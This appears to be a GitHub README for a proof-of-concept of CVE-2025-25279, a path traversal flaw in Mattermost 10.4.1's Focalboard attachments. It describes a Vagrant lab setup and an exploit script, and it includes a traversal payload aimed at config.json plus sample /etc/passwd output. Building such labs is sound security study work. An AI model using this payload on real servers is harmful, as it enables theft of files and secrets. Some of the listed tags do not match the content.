Abokor-creator/CVE-2025-25279-Mattermost-Path-Traversal
GitHub: Abokor-creator/CVE-2025-25279-Mattermost-Path-Traversal
针对 Mattermost 10.4.1 Focalboard 模块路径遍历漏洞(CVE-2025-25279)的概念验证项目,包含一键靶机环境和利用脚本,可复现已认证用户通过附件功能读取服务器任意文件的过程。
Stars: 0 | Forks: 0
# 🔥 CVE-2025-25279 — Mattermost 10.4.1
## 📤 Focalboard 中的路径遍历漏洞允许文件窃取
## 🌟 概述
此概念验证演示了影响 **Mattermost 10.4.1** 的 **CVE-2025-25279** 漏洞的利用过程。
**Focalboard**(看板管理模块)中的一个缺陷允许通过 **attachments(附件)中的 path traversal(路径遍历)** 进行**任意文件读取**。
该 exploit(漏洞利用程序)可用于窃取:
- `/etc/passwd`
- `/etc/group`
- 或 Mattermost 的敏感文件,例如:
`opt/mattermost/config/config.json`
该攻击**仅在易受攻击的场景中通过已认证的用户账户**进行。
## 🗂️ 目录结构
- **📁 target**:创建目标 box 的目录
- **📁 live**:创建目标虚拟机及演示 exploit 的目录
- **📁 src**:辅助源代码(如有)
- **📁 refs**:包含文章和参考书的目录
- **📁 docs**:项目期间生成的相关文档,包括视频录像
## 🔧 前提条件
- **Vagrant**
- **VirtualBox**
- **项目文件集(target + live)**
- **Mattermost 账户(PAT = Personal Access Token,个人访问令牌)**
- 带有 Bash 的 Linux/Mac/Windows
# 📦 下载 Mattermost
未包含 `target/` 目录(对于 GitHub 而言体积过大)。
请手动下载:
https://releases.mattermost.com/10.4.1/mattermost-10.4.1-linux-amd64.tar.gz
## 然后将文件放置在:*target*
## 在部署虚拟机之前
首先进入 target 目录并执行:
```
cd target
make mattermost.box
```
请确保您拥有 mattermost-poc box,否则虚拟机将无法运行:
```
cd cve-2025-25279-mattermost
vagrant box add mattermost-poc target/mattermost.box
```
## 1. 部署易受攻击的机器
#### 启动虚拟机
```
cd live/vm1
vagrant up
```
连接到虚拟机
```
vagrant ssh
```
#### 在 Web 界面中创建用户:
打开:http://localhost:8065
#### 在 UI(用户界面)中创建 token(令牌):
**Profile(个人资料) --> Security(安全) --> Personal Access Tokens(个人访问令牌)**
### 2. 安装 exploit(漏洞利用程序)
从宿主机执行:
```
cd live/share
sudo apt-get update -y
sudo apt-get install -y unzip
chmod +x exploit.sh
```
### 3. 运行 exploit(漏洞利用程序)
```
./exploit.sh
```
系统将提示您:
```
PAT (Personal Access Token) :
```
👉 输入有效的 Mattermost 用户的 PAT。
📸 输出示例(窃取 /etc/passwd)
```
===== CONTENU (début) =====
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
...
mattermost:x:999:996::/opt/mattermost:/bin/sh
```
**目标文件:config.json**
要定位 Mattermost 敏感文件:
修改 exploit.sh 脚本顶部的:
```
TARGET_SUFFIX="opt/mattermost/config/config.json"
TRAVERSAL_PATH='../../../../../../../opt/mattermost/config/config.json'
L’exploit affichera alors le contenu du fichier config.json.
```
## ✒️ 作者
🟢 **MAHAMMAD MOUSSE Abokor**
🔵 **PARNET cyril**
🎬 **视频演示**
👉 完整的视频演示位于:
live/Démonstration/video-poc-cve-2025-25279.mp4
🧩 注意事项
此 PoC 严格用于学习环境。
切勿在教学环境之外或未经授权的情况下使用。
标签:CISA项目, CVE-2025-25279, Focalboard, Mattermost, PoC, Vagrant, VirtualBox, Web安全, XXE攻击, 任意文件读取, 应用安全, 文件泄露, 暴力破解, 漏洞复现, 网络安全, 网络安全审计, 蓝队分析, 路径遍历, 配置修复, 隐私保护